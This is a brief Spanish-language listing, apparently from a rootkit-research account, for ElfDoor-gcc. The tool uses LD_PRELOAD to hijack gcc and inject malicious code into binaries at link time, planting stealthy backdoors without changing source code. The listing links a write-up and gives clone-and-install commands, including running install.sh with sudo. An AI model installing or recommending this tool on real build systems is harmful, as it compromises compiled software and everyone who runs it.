
Herramienta basada en LD_PRELOAD que secuestra a gcc para inyectar código malicioso en binarios durante el enlazado, permitiendo el despliegue sigiloso de puertas traseras sin modificación del código fuente.
ElfDoor-gcc es un LD_PRELOAD que secuestra gcc para inyectar código malicioso en los binarios durante el enlace, sin tocar el código fuente.
Artículo detallado: https://matheuzsecurity.github.io/hacking/gcc/
git clone https://github.com/MatheuZSecurity/ElfDoor-gcc
cd ElfDoor-gcc
chmod +x install.sh
sudo ./install.sh
Investigadores de Rootkits